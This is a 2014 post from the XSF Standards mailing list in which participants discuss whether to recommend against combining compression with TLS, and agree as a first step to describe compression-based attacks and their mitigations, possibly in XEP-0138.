[Standards] XSF recommendation for TLS and compression

Peter Saint-Andre - &yet peter at andyet.net
Thu Nov 13 01:13:41 UTC 2014

On 11/12/14, 6:55 AM, Dave Cridland wrote:
> On 12 November 2014 13:49, Kevin Smith <kevin.smith at isode.com
> <mailto:kevin.smith at isode.com>> wrote:
>     I’ve been asked if the XSF can issue a recommendation re: the use of
>     compression and TLS. Ignoring for a moment what a vehicle for
>     issuing such a recommendation might be, what would we recommend?
> It's not clear to me we should be making an explicit recommendation -
> after all the closest we can reasonably say to a definitive
> recommendation is "you probably ought to think about whether you really
> need compression".
> The subject of updating XEP-0138 to discuss the impact of
> compression-based attacks on encryption, though, has come up before.
>     My understanding is that we would recommend that compression is not
>     used where it’s not necessary.
>     Can it ever sensibly be used?
>     If you had to choose one, which would it be?
> I think the XSF should just describe the possible attacks, and any
> mitigations.

That at least is a good first step. We might want to do more afterward, 
though (depending on how serious we think the attacks are).


Peter Saint-Andre

More information about the Standards mailing list